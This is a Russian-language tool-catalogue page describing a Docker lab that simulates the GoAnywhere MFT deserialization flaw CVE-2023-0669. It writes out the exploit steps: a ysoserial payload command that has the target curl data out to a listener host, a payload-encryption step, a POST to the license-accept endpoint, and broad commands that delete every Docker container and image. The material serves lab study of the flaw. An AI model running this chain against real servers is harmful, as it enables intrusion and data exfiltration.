Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2023-0669-simulation — Среда моделирования для CVE-2023-0669 с контейнерами атакующего, уязвимого сервера и слушателя на основе Docker. Демонстрирует генерацию эксплойта десериализации, шифрование полезной нагрузки и эксфильтрацию данных. | Kitploit
Инструменты/GitHubGitHub/zakaria-laouani/cve-2023-0669-simulation
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхКомандование и Управление
GitHubzakaria-laouani/cve-2023-0669-simulation

cve-2023-0669-simulation

Среда моделирования для CVE-2023-0669 с контейнерами атакующего, уязвимого сервера и слушателя на основе Docker. Демонстрирует генерацию эксплойта десериализации, шифрование полезной нагрузки и эксфильтрацию данных.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
7 месяцев назадЕщё не проверено

Структура проекта

cve-2023-0669-simulation/ ├── docker-compose.yml ├── attacker/ │ ├── Dockerfile │ └── CVE_2023_0669_helper.java ├── vulnerable/ │ ├── Dockerfile │ └── VulnerableServer.java ├── listener/ │ ├── Dockerfile │ └── server.py └── received/ ← создаётся автоматически (эксфильтрация)

2. Запуск 3 контейнеров (атакующий, vulnerable, listener)

docker-compose up --build

Проблема: ошибка KeyError: 'ContainerConfig' при docker compose up

Этот проект требует:

  • Docker Engine: v24 или v25 минимум
  • Docker Compose: v2.20+ (включён автоматически с Docker)

KeyError: 'ContainerConfig' при docker compose up Обычно это происходит из-за устаревших или повреждённых метаданных Docker, либо старых образов. Удалите сломанные контейнеры, образы и метаданные:

docker compose down --remove-orphans

docker rm -f $(docker ps -aq)

docker rmi -f $(docker images -q)

Затем пересоберите чисто:

docker compose build --no-cache

docker compose up

3. Зайдите в контейнер атакующего

docker exec -it attacker bash

Генерация безопасного payload (отправляет просто сообщение)```

java -jar ysoserial-all.jar CommonsCollections6 'curl -s http://listener:8080/receive -d "PWNED-CVE-2023-0669-simulation-$(date)"' > payload.ser

Шифрование payload

java CVE_2023_0669_helper payload.ser 1

→ Скопируйте всю длинную строку, которая отобразится (Ctrl+A затем Ctrl+C)

Отправка эксплойта (замените LA_CHAINE на то, что вы только что скопировали)

curl -X POST http://vulnerable:8001/goanywhere/lic/accept
-d "encryptedLicenseResponseData=LA_CHAÎNE_BASE64_ICI"
-d "acceptLicense=true"

7. Немедленный результат

Вы увидите в логах listener (или в папке ./received на вашем ПК):

PWNED ! Получено 42 bytes → PWNED-CVE-2023-0669-simulation-Sat 06 Dec 2025...

Скачать инструмент